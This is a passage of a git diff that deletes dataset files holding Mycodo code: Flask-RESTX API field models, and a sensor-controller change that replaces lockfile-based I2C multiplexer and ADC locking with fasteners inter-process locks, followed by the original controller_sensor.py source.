fields.String, - 'uart_location': fields.String, - 'baud_rate': fields.Integer, - 'pin_clock': fields.Integer, - 'pin_cs': fields.Integer, - 'pin_mosi': fields.Integer, - 'pin_miso': fields.Integer, - 'bt_adapter': fields.String, - 'switch_edge': fields.String, - 'switch_bouncetime': fields.Integer, - 'switch_reset_period': fields.Integer, - 'pre_output_id': fields.String, - 'pre_output_duration': fields.Float, - 'pre_output_during_measure': fields.Boolean, - 'sht_voltage': fields.String, - 'adc_gain': fields.Integer, - 'adc_resolution': fields.Integer, - 'adc_sample_speed': fields.String, - 'cmd_command': fields.String, - 'weighting': fields.Float, - 'rpm_pulses_per_rev': fields.Float, - 'sample_time': fields.Float, - 'port': fields.Integer, - 'times_check': fields.Integer, - 'deadline': fields.Integer, - 'datetime': fields.DateTime, - 'custom_options': fields.String -}) - -math_fields = api.model('Math Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'math_type': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Integer, - 'order_of_use': fields.String, - 'difference_reverse_order': fields.Boolean, - 'difference_absolute': fields.Boolean, - 'equation_input': fields.String, - 'equation': fields.String, - 'max_difference': fields.Float, - 'inputs': fields.String, - 'dry_bulb_t_id': fields.String, - 'dry_bulb_t_measure_id': fields.String, - 'wet_bulb_t_id': fields.String, - 'wet_bulb_t_measure_id': fields.String, - 'pressure_pa_id': fields.String, - 'pressure_pa_measure_id': fields.String, - 'unique_id_1': fields.String, - 'unique_measurement_id_1': 
fields.String, - 'unique_id_2': fields.String, - 'unique_measurement_id_2': fields.String, -}) - -measurement_fields = api.model('Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'units': fields.String -}) - -output_fields = api.model('Output Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'output_type': fields.String, - 'output_mode': fields.String, - 'interface': fields.String, - 'location': fields.String, - 'i2c_bus': fields.Integer, - 'baud_rate': fields.Integer, - 'name': fields.String, - 'measurement': fields.String, - 'unit': fields.String, - 'conversion_id': fields.String, - 'channel': fields.Integer, - 'pin': fields.Integer, - 'on_state': fields.Boolean, - 'amps': fields.Float, - 'on_until': fields.DateTime, - 'off_until': fields.DateTime, - 'last_duration': fields.Float, - 'on_duration': fields.Boolean, - 'protocol': fields.Integer, - 'pulse_length': fields.Integer, - 'on_command': fields.String, - 'off_command': fields.String, - 'pwm_command': fields.String, - 'trigger_functions_at_start': fields.Boolean, - 'state_startup': fields.String, - 'startup_value': fields.Float, - 'state_shutdown': fields.String, - 'shutdown_value': fields.Float, - 'pwm_hertz': fields.Integer, - 'pwm_library': fields.String, - 'pwm_invert_signal': fields.Boolean, - 'flow_rate': fields.Float -}) - -pid_fields = api.model('PID Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'is_held': fields.Boolean, - 'is_paused': fields.Boolean, - 'is_preset': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'preset_name': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Float, - 'measurement': fields.String, - 'direction': fields.String, - 'setpoint': fields.Float, - 'band': fields.Float, - 'p': fields.Float, - 'i': fields.Float, - 'd': fields.Float, - 'integrator_min': fields.Float, - 'integrator_max': fields.Float, - 'raise_output_id': fields.String, - 'raise_min_duration': fields.Float, - 'raise_max_duration': fields.Float, - 'raise_min_off_duration': fields.Float, - 'lower_output_id': fields.String, - 'lower_min_duration': fields.Float, - 'lower_max_duration': fields.Float, - 'lower_min_off_duration': fields.Float, - 'store_lower_as_negative': fields.Boolean, - 'setpoint_tracking_type': fields.String, - 'setpoint_tracking_id': fields.String, - 'setpoint_tracking_max_age': fields.Float, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'autotune_activated': fields.Boolean, - 'autotune_noiseband': fields.Float, - 'autotune_outstep': fields.Float -}) - -trigger_fields = api.model('Trigger Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'trigger_type': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'unique_id_1': fields.String, - 'unique_id_2': fields.String, - 'output_state': fields.String, - 'output_duration': fields.Float, - 'output_duty_cycle': fields.Float, - 'rise_or_set': fields.String, - 'latitude': fields.Float, - 'longitude': fields.Float, - 'zenith': fields.Float, - 'date_offset_days': fields.Integer, - 'time_offset_minutes': fields.Integer, - 'period': fields.Float, - 'timer_start_offset': fields.Integer, - 'timer_start_time': fields.String, - 'timer_end_time': fields.String, - 'program': fields.String, - 'word': fields.String, 
- 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'trigger_actions_at_period': fields.Boolean, - 'trigger_actions_at_start': fields.Boolean, - 'measurement': fields.String, - 'edge_detected': fields.String, -}) - -unit_fields = api.model('Unit Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'unit': fields.String -}) - -user_fields = api.model('User Settings Fields', { - "id": fields.Integer, - "unique_id": fields.String, - "name": fields.String, - "email": fields.String, - "role_id": fields.Integer, - "theme": fields.String, - "landing_page": fields.String, - "language": fields.String -}) diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff deleted file mode 100644 index 39b7bb3..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff +++ /dev/null @@ -1,306 +0,0 @@ -diff --git a/mycodo/controller_sensor.py b/mycodo/controller_sensor.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/controller_sensor.py - +++ b/mycodo/controller_sensor.py -@@ -23,12 +23,12 @@ - # Contact at kylegabriel.com - - import logging -+import fasteners - import requests - import threading - import time - import timeit - import RPi.GPIO as GPIO --from lockfile import LockFile - - from mycodo_client import DaemonControl - from databases.models import Camera -@@ -223,6 +223,8 @@ class SensorController(threading.Thread): - self.mux_address = int(str(self.mux_address_raw), 16) - self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format( - i2c=self.mux_address) -+ self.mux_lock = fasteners.InterProcessLock(self.mux_lock) -+ self.mux_lock_acquired = False - self.multiplexer = TCA9548A(self.mux_bus, self.mux_address) - else: - self.multiplexer = None -@@ -240,7 +242,9 @@ class SensorController(threading.Thread): - else: - self.switch_edge_gpio = GPIO.BOTH - -- self.lock_multiplexer() -+ # Lock multiplexer, if it's enabled -+ if self.multiplexer: -+ self.lock_multiplexer() - - # Set up analog-to-digital converter - if self.device == 'ADS1x15': -@@ -369,7 +373,8 @@ class SensorController(threading.Thread): - raise Exception("'{device}' is not a valid device type.".format( - device=self.device)) - -- self.unlock_multiplexer() -+ if self.multiplexer: -+ self.unlock_multiplexer() - - self.edge_reset_timer = time.time() - self.sensor_timer = time.time() -@@ -681,37 +686,99 @@ class SensorController(threading.Thread): - - def lock_multiplexer(self): - """ Acquire a multiplexer lock """ -- if self.multiplexer: -- (lock_status, -- lock_response) = self.setup_lock(self.mux_address, -- self.mux_bus, -- self.mux_lock) -- if not lock_status: -- self.logger.warning( -- "Could not acquire lock for multiplexer. 
Error: " -- "{err}".format(err=lock_response)) -- self.updateSuccess = False -- return 1 -- self.logger.debug( -- "Setting multiplexer ({add}) to channel {chan}".format( -+ self.mux_lock_acquired = False -+ -+ for i in range(600): -+ self.mux_lock_acquired = self.mux_lock.acquire(blocking=False) -+ if self.mux_lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if not self.mux_lock_acquired: -+ self.logger.error( -+ "Unable to acquire lock: {lock}".format(lock=self.mux_lock)) -+ -+ self.logger.debug( -+ "Setting multiplexer ({add}) to channel {chan}".format( -+ add=self.mux_address_string, -+ chan=self.mux_chan)) -+ -+ # Set multiplexer channel -+ (multiplexer_status, -+ multiplexer_response) = self.multiplexer.setup(self.mux_chan) -+ -+ if not multiplexer_status: -+ self.logger.warning( -+ "Could not set channel with multiplexer at address {add}." -+ " Error: {err}".format( - add=self.mux_address_string, -- chan=self.mux_chan)) -- # Set multiplexer channel -- (multiplexer_status, -- multiplexer_response) = self.multiplexer.setup(self.mux_chan) -- if not multiplexer_status: -- self.logger.warning( -- "Could not set channel with multiplexer at address {add}." -- " Error: {err}".format( -- add=self.mux_address_string, -- err=multiplexer_response)) -- self.updateSuccess = False -- return 1 -+ err=multiplexer_response)) -+ self.updateSuccess = False -+ return 1 - - def unlock_multiplexer(self): - """ Remove a multiplexer lock """ -- if self.multiplexer: -- self.release_lock(self.mux_address, self.mux_bus, self.mux_lock) -+ if self.mux_lock and self.mux_lock_acquired: -+ self.mux_lock.release() -+ -+ def read_adc(self, measurements): -+ """ Read voltage from ADC """ -+ try: -+ gotten = False -+ adc_lock = fasteners.InterProcessLock(self.adc_lock_file) -+ for i in range(600): -+ gotten = adc_lock.acquire(blocking=False) -+ if gotten: -+ break -+ else: -+ time.sleep(0.1) -+ if not gotten: -+ self.logger.error( -+ "Unable to acquire lock: {lock}".format( -+ lock=self.adc_lock_file)) -+ -+ # Get measurement from ADC -+ measurements = self.adc.next() -+ if measurements is not None: -+ # Get the voltage difference between min and max volts -+ diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) -+ # Ensure the voltage stays within the min/max bounds -+ if measurements['voltage'] < self.adc_volts_min: -+ measured_voltage = self.adc_volts_min -+ elif measurements['voltage'] > self.adc_volts_max: -+ measured_voltage = self.adc_volts_max -+ else: -+ measured_voltage = measurements['voltage'] -+ # Calculate the percentage of the voltage difference -+ percent_diff = ((measured_voltage - self.adc_volts_min) / -+ diff_voltage) -+ -+ # Get the units difference between min and max units -+ diff_units = abs(self.adc_units_max - self.adc_units_min) -+ # Calculate the measured units from the percent difference -+ if self.adc_inverse_unit_scale: -+ converted_units = (self.adc_units_max - -+ (diff_units * percent_diff)) -+ else: -+ converted_units = (self.adc_units_min + -+ (diff_units * percent_diff)) -+ # Ensure the units stay within the min/max bounds -+ if converted_units < self.adc_units_min: -+ measurements[self.adc_measure] = self.adc_units_min -+ elif converted_units > self.adc_units_max: -+ measurements[self.adc_measure] = self.adc_units_max -+ else: -+ measurements[self.adc_measure] = converted_units -+ -+ if adc_lock and gotten: -+ adc_lock.release() -+ -+ except Exception as except_msg: -+ self.logger.exception( -+ "Error while attempting to read adc: {err}".format( -+ err=except_msg)) -+ 
return measurements - - def update_measure(self): - """ -@@ -728,62 +795,12 @@ class SensorController(threading.Thread): - self.updateSuccess = False - return 1 - -- self.lock_multiplexer() -+ # Lock multiplexer, if it's enabled -+ if self.multiplexer: -+ self.lock_multiplexer() - - if self.adc: -- try: -- # Acquire a lock for ADC -- (lock_status, -- lock_response) = self.setup_lock(self.i2c_address, -- self.i2c_bus, -- self.adc_lock_file) -- if not lock_status: -- self.logger.warning( -- "Could not acquire lock for multiplexer. Error: " -- "{err}".format(err=lock_response)) -- self.updateSuccess = False -- return 1 -- -- # Get measurement from ADC -- measurements = self.adc.next() -- if measurements is not None: -- # Get the voltage difference between min and max volts -- diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) -- # Ensure the voltage stays within the min/max bounds -- if measurements['voltage'] < self.adc_volts_min: -- measured_voltage = self.adc_volts_min -- elif measurements['voltage'] > self.adc_volts_max: -- measured_voltage = self.adc_volts_max -- else: -- measured_voltage = measurements['voltage'] -- # Calculate the percentage of the voltage difference -- percent_diff = ((measured_voltage - self.adc_volts_min) / -- diff_voltage) -- -- # Get the units difference between min and max units -- diff_units = abs(self.adc_units_max - self.adc_units_min) -- # Calculate the measured units from the percent difference -- if self.adc_inverse_unit_scale: -- converted_units = (self.adc_units_max - -- (diff_units * percent_diff)) -- else: -- converted_units = (self.adc_units_min + -- (diff_units * percent_diff)) -- # Ensure the units stay within the min/max bounds -- if converted_units < self.adc_units_min: -- measurements[self.adc_measure] = self.adc_units_min -- elif converted_units > self.adc_units_max: -- measurements[self.adc_measure] = self.adc_units_max -- else: -- measurements[self.adc_measure] = converted_units -- except Exception as except_msg: -- self.logger.exception( -- "Error while attempting to read adc: {err}".format( -- err=except_msg)) -- finally: -- self.release_lock(self.i2c_address, -- self.i2c_bus, -- self.adc_lock_file) -+ measurements = self.read_adc(measurements) - else: - try: - # Get measurement from sensor -@@ -806,7 +823,8 @@ class SensorController(threading.Thread): - "Error while attempting to read sensor: {err}".format( - err=except_msg)) - -- self.unlock_multiplexer() -+ if self.multiplexer: -+ self.unlock_multiplexer() - - if self.device_recognized and measurements is not None: - self.measurement = Measurement(measurements) -@@ -816,53 +834,6 @@ class SensorController(threading.Thread): - - self.lastUpdate = time.time() - -- def setup_lock(self, i2c_address, i2c_bus, lockfile): -- execution_timer = timeit.default_timer() -- try: -- self.lock[lockfile] = LockFile(lockfile) -- while not self.lock[lockfile].i_am_locking(): -- try: -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Acquiring Lock: " -- "{lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- # wait up to 60 seconds -- self.lock[lockfile].acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} raised an exception: {err}".format( -- cls=type(self).__name__, err=e)) -- self.logger.exception( -- "[Locking bus-{bus} 0x{i2c:02X}] Waited 60 seconds. 
" -- "Breaking lock to acquire {lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- self.lock[lockfile].break_lock() -- self.lock[lockfile].acquire() -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Acquired Lock: " -- "{lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Executed in {ms:.1f} ms".format( -- bus=i2c_bus, -- i2c=i2c_address, -- ms=(timeit.default_timer()-execution_timer)*1000)) -- return 1, "Success" -- except Exception as msg: -- return 0, "Multiplexer Fail: {}".format(msg) -- -- def release_lock(self, i2c_address, i2c_bus, lockfile): -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Releasing Lock: {lock}".format( -- bus=i2c_bus, i2c=i2c_address, lock=lockfile)) -- self.lock[lockfile].release() -- - def get_last_measurement(self, measurement_type): - """ - Retrieve the latest sensor measurement diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py deleted file mode 100644 index fb2fe70..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py +++ /dev/null @@ -1,974 +0,0 @@ -# coding=utf-8 -# -# controller_sensor.py - Sensor controller that manages reading sensors and -# creating database entries -# -# Copyright (C) 2017 Kyle T. Gabriel -# -# This file is part of Mycodo -# -# Mycodo is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# Mycodo is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Mycodo. If not, see . 
-# -# Contact at kylegabriel.com - -import logging -import requests -import threading -import time -import timeit -import RPi.GPIO as GPIO -from lockfile import LockFile - -from mycodo_client import DaemonControl -from databases.models import Camera -from databases.models import Conditional -from databases.models import ConditionalActions -from databases.models import PID -from databases.models import Relay -from databases.models import Sensor -from databases.models import SMTP - -from devices.tca9548a import TCA9548A -from devices.ads1x15 import ADS1x15Read -from devices.mcp342x import MCP342xRead -from sensors.mycodo_ram import MycodoRam -from sensors.atlas_ph import AtlaspHSensor -from sensors.atlas_pt1000 import AtlasPT1000Sensor -from sensors.am2315 import AM2315Sensor -from sensors.bh1750 import BH1750Sensor -from sensors.bme280 import BME280Sensor -from sensors.bmp180 import BMP180Sensor -from sensors.bmp280 import BMP280Sensor -from sensors.chirp import ChirpSensor -from sensors.dht11 import DHT11Sensor -from sensors.dht22 import DHT22Sensor -from sensors.ds18b20 import DS18B20Sensor -from sensors.htu21d import HTU21DSensor -from sensors.k30 import K30Sensor -from sensors.linux_command import LinuxCommand -from sensors.mh_z16 import MHZ16Sensor -from sensors.mh_z19 import MHZ19Sensor -from sensors.raspi import RaspberryPiCPUTemp -from sensors.raspi_cpuload import RaspberryPiCPULoad -from sensors.raspi_freespace import RaspberryPiFreeSpace -from sensors.tmp006 import TMP006Sensor -from sensors.tsl2561 import TSL2561Sensor -from sensors.tsl2591_sensor import TSL2591Sensor -from sensors.sht1x_7x import SHT1x7xSensor -from sensors.sht2x import SHT2xSensor -from sensors.signal_pwm import PWMInput -from sensors.signal_rpm import RPMInput - -from devices.camera import camera_record -from utils.database import db_retrieve_table_daemon -from utils.influx import format_influxdb_data -from utils.influx import read_last_influxdb -from utils.influx import write_influxdb_list -from utils.influx import write_influxdb_value -from utils.send_data import send_email -from utils.system_pi import cmd_output - -from config import LIST_DEVICES_I2C - - -class Measurement: - """ - Class for holding all measurement values in a dictionary. - The dictionary is formatted in the following way: - - {'measurement type':measurement value} - - Measurement type: The environmental or physical condition - being measured, such as 'temperature', or 'pressure'. - - Measurement value: The actual measurement of the condition. 
- """ - - def __init__(self, raw_data): - self.rawData = raw_data - - @property - def values(self): - return self.rawData - - -class SensorController(threading.Thread): - """ - Class for controlling the sensor - - """ - def __init__(self, ready, sensor_id): - threading.Thread.__init__(self) - - self.logger = logging.getLogger( - "mycodo.sensor_{id}".format(id=sensor_id)) - - self.stop_iteration_counter = 0 - self.thread_startup_timer = timeit.default_timer() - self.thread_shutdown_timer = 0 - self.ready = ready - self.lock = {} - self.measurement = None - self.updateSuccess = False - self.sensor_id = sensor_id - self.control = DaemonControl() - self.pause_loop = False - self.verify_pause_loop = True - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - self.cond_do_relay_id = {} - self.cond_do_relay_state = {} - self.cond_do_relay_duration = {} - self.cond_execute_command = {} - self.cond_email_notify = {} - self.cond_do_lcd_id = {} - self.cond_do_camera_id = {} - self.cond_timer = {} - self.smtp_wait_timer = {} - - self.setup_sensor_conditionals() - - sensor = db_retrieve_table_daemon(Sensor, device_id=self.sensor_id) - self.sensor_sel = sensor - self.unique_id = sensor.unique_id - self.i2c_bus = sensor.i2c_bus - self.location = sensor.location - self.power_relay_id = sensor.power_relay_id - self.measurements = sensor.measurements - self.device = sensor.device - self.interface = sensor.interface - self.device_loc = sensor.device_loc - self.baud_rate = sensor.baud_rate - self.period = sensor.period - self.resolution = sensor.resolution - self.sensitivity = sensor.sensitivity - self.cmd_command = sensor.cmd_command - self.cmd_measurement = sensor.cmd_measurement - self.cmd_measurement_units = sensor.cmd_measurement_units - self.mux_address_raw = sensor.multiplexer_address - self.mux_bus = sensor.multiplexer_bus - self.mux_chan = sensor.multiplexer_channel - self.adc_chan = sensor.adc_channel - self.adc_gain = sensor.adc_gain - self.adc_resolution = sensor.adc_resolution - self.adc_measure = sensor.adc_measure - self.adc_measure_units = sensor.adc_measure_units - self.adc_volts_min = sensor.adc_volts_min - self.adc_volts_max = sensor.adc_volts_max - self.adc_units_min = sensor.adc_units_min - self.adc_units_max = sensor.adc_units_max - self.adc_inverse_unit_scale = sensor.adc_inverse_unit_scale - self.sht_clock_pin = sensor.sht_clock_pin - self.sht_voltage = sensor.sht_voltage - - # Edge detection - self.switch_edge = sensor.switch_edge - self.switch_bouncetime = sensor.switch_bouncetime - self.switch_reset_period = sensor.switch_reset_period - - # PWM and RPM options - self.weighting = sensor.weighting - self.rpm_pulses_per_rev = sensor.rpm_pulses_per_rev - self.sample_time = sensor.sample_time - - # Relay that will activate prior to sensor read - self.pre_relay_id = sensor.pre_relay_id - self.pre_relay_duration = sensor.pre_relay_duration - self.pre_relay_setup = False - self.next_measurement = time.time() - self.get_new_measurement = False - self.trigger_cond = False - self.measurement_acquired = False - self.pre_relay_activated = False - self.pre_relay_timer = time.time() - - relay = db_retrieve_table_daemon(Relay, entry='all') - for each_relay in relay: # Check if relay ID 
actually exists - if each_relay.id == self.pre_relay_id and self.pre_relay_duration: - self.pre_relay_setup = True - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - self.smtp_max_count = smtp.hourly_max - self.email_count = 0 - self.allowed_to_send_notice = True - - # Convert string I2C address to base-16 int - if self.device in LIST_DEVICES_I2C: - self.i2c_address = int(str(self.location), 16) - - # Set up multiplexer if enabled - if self.device in LIST_DEVICES_I2C and self.mux_address_raw: - self.mux_address_string = self.mux_address_raw - self.mux_address = int(str(self.mux_address_raw), 16) - self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format( - i2c=self.mux_address) - self.multiplexer = TCA9548A(self.mux_bus, self.mux_address) - else: - self.multiplexer = None - - if self.device in ['ADS1x15', 'MCP342x'] and self.location: - self.adc_lock_file = "/var/lock/mycodo_adc_bus{bus}_0x{i2c:02X}.pid".format( - bus=self.i2c_bus, i2c=self.i2c_address) - - # Set up edge detection of a GPIO pin - if self.device == 'EDGE': - if self.switch_edge == 'rising': - self.switch_edge_gpio = GPIO.RISING - elif self.switch_edge == 'falling': - self.switch_edge_gpio = GPIO.FALLING - else: - self.switch_edge_gpio = GPIO.BOTH - - self.lock_multiplexer() - - # Set up analog-to-digital converter - if self.device == 'ADS1x15': - self.adc = ADS1x15Read(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain) - elif self.device == 'MCP342x': - self.adc = MCP342xRead(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain, - self.adc_resolution) - else: - self.adc = None - - self.device_recognized = True - - # Set up sensors or devices - if self.device in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor = None - elif self.device == 'MYCODO_RAM': - self.measure_sensor = MycodoRam() - elif self.device == 'RPiCPULoad': - self.measure_sensor = RaspberryPiCPULoad() - elif self.device == 'RPi': - self.measure_sensor = RaspberryPiCPUTemp() - elif self.device == 'RPiFreeSpace': - self.measure_sensor = RaspberryPiFreeSpace(self.location) - elif self.device == 'AM2302': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location)) - elif self.device == 'AM2315': - self.measure_sensor = AM2315Sensor(self.sensor_id, - self.i2c_bus, - power=self.power_relay_id) - elif self.device == 'ATLAS_PH_I2C': - self.measure_sensor = AtlaspHSensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PH_UART': - self.measure_sensor = AtlaspHSensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PT1000_I2C': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'ATLAS_PT1000_UART': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'BH1750': - self.measure_sensor = BH1750Sensor(self.i2c_address, - self.i2c_bus, - self.resolution, - self.sensitivity) - elif self.device == 'BME280': - self.measure_sensor = BME280Sensor(self.i2c_address, - self.i2c_bus) - # TODO: BMP is an old designation and will be removed in the future - elif self.device in ['BMP', 'BMP180']: - self.measure_sensor = BMP180Sensor(self.i2c_bus) - elif self.device == 'BMP280': - self.measure_sensor = BMP280Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'CHIRP': - 
self.measure_sensor = ChirpSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'DS18B20': - self.measure_sensor = DS18B20Sensor(self.location) - elif self.device == 'DHT11': - self.measure_sensor = DHT11Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'DHT22': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'HTU21D': - self.measure_sensor = HTU21DSensor(self.i2c_bus) - elif self.device == 'K30_UART': - self.measure_sensor = K30Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z16_I2C': - self.measure_sensor = MHZ16Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'MH_Z16_UART': - self.measure_sensor = MHZ16Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z19_UART': - self.measure_sensor = MHZ19Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'SHT1x_7x': - self.measure_sensor = SHT1x7xSensor(int(self.location), - self.sht_clock_pin, - self.sht_voltage) - elif self.device == 'SHT2x': - self.measure_sensor = SHT2xSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'SIGNAL_PWM': - self.measure_sensor = PWMInput(int(self.location), - self.weighting, - self.sample_time) - elif self.device == 'SIGNAL_RPM': - self.measure_sensor = RPMInput(int(self.location), - self.weighting, - self.rpm_pulses_per_rev, - self.sample_time) - elif self.device == 'TMP006': - self.measure_sensor = TMP006Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2561': - self.measure_sensor = TSL2561Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2591': - self.measure_sensor = TSL2591Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'LinuxCommand': - self.measure_sensor = LinuxCommand(self.cmd_command, - self.cmd_measurement) - else: - self.device_recognized = False - self.logger.debug("Device '{device}' not recognized".format( - device=self.device)) - raise Exception("'{device}' is not a valid device type.".format( - device=self.device)) - - self.unlock_multiplexer() - - self.edge_reset_timer = time.time() - self.sensor_timer = time.time() - self.running = False - self.lastUpdate = None - - def run(self): - try: - self.running = True - self.logger.info("Activated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_startup_timer) * 1000)) - self.ready.set() - - # Set up edge detection - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.setup(int(self.location), GPIO.IN) - GPIO.add_event_detect(int(self.location), - self.switch_edge_gpio, - callback=self.edge_detected, - bouncetime=self.switch_bouncetime) - - while self.running: - # Pause loop to modify conditional statements. - # Prevents execution of conditional while variables are - # being modified. 
- if self.pause_loop: - self.verify_pause_loop = True - while self.pause_loop: - time.sleep(0.1) - - if self.device not in ['EDGE']: - # Signal that a measurement needs to be obtained - if time.time() > self.next_measurement and not self.get_new_measurement: - self.get_new_measurement = True - self.trigger_cond = True - self.next_measurement = time.time() + self.period - - # if signaled and a pre relay is set up correctly, turn the - # relay on for the set duration - if (self.get_new_measurement and - self.pre_relay_setup and - not self.pre_relay_activated): - relay_on = threading.Thread( - target=self.control.relay_on, - args=(self.pre_relay_id, - self.pre_relay_duration,)) - relay_on.start() - self.pre_relay_activated = True - self.pre_relay_timer = time.time() + self.pre_relay_duration - - # If using a pre relay, wait for it to complete before - # querying the sensor for a measurement - if self.get_new_measurement: - if ((self.pre_relay_setup and - self.pre_relay_activated and - time.time() < self.pre_relay_timer) or - not self.pre_relay_setup): - # Get measurement(s) from sensor - self.update_measure() - # Add measurement(s) to influxdb - self.add_measure_influxdb() - self.pre_relay_activated = False - self.get_new_measurement = False - - for each_cond_id in self.cond_id: - if self.cond_is_activated[each_cond_id]: - # Check sensor conditional if it has been activated - if (self.device in ['EDGE'] and - self.cond_if_sensor_edge_select[each_cond_id] == 'state' and - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are triggered (switch, reed, hall, etc.) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - elif ((not self.cond_timer[each_cond_id] and self.trigger_cond) or - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are not triggered (sensors) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - - self.trigger_cond = False - - time.sleep(0.1) - - self.running = False - - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.cleanup(int(self.location)) - - self.logger.info("Deactivated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_shutdown_timer) * 1000)) - except requests.ConnectionError: - self.logger.error("Could not connect to influxdb. Check that it " - "is running and accepting connections") - except Exception as except_msg: - self.logger.exception("Error: {err}".format( - err=except_msg)) - - def add_measure_influxdb(self): - """ - Add a measurement entries to InfluxDB - - :rtype: None - """ - if self.updateSuccess: - data = [] - for each_measurement, each_value in self.measurement.values.items(): - data.append(format_influxdb_data(self.unique_id, - each_measurement, - each_value)) - write_db = threading.Thread( - target=write_influxdb_list, - args=(data,)) - write_db.start() - - def check_conditionals(self, cond_id): - """ - Check if any sensor conditional statements are activated and - execute their actions if the conditional is true. 
